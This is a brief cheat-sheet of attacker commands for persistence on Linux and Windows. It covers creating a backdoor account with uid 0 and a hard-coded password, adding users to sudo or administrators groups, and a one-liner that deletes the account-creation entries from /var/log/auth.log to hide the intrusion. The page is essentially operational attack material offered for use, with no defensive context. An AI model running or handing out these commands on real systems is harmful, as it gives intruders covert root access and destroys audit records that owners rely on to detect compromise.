Privilege Escalation¶
Linux¶
Add user directly to /etc/passwd
, /etc/shadow
, /etc/group
and /etc/gshadow
.
useradd -u 0 -e -g 0 <username>
passwd <username>
# -or-
USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment Here"
&& sudo useradd -p $PASSWD --system --shell '/bin/bash' --base-dir "/bin" --uid 0 --
non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;'
/var/log/auth.log
# -or-
adduser -u 0 -g root -G root -s /bin/bash -r HackerS2H -p 123456
Modify user groups by
sudo usermod -aG sudo username
# -or-
sudo gpasswd -a username sudo
Windows¶
net user <username> <password> /add
net localgroup administrators <username> /add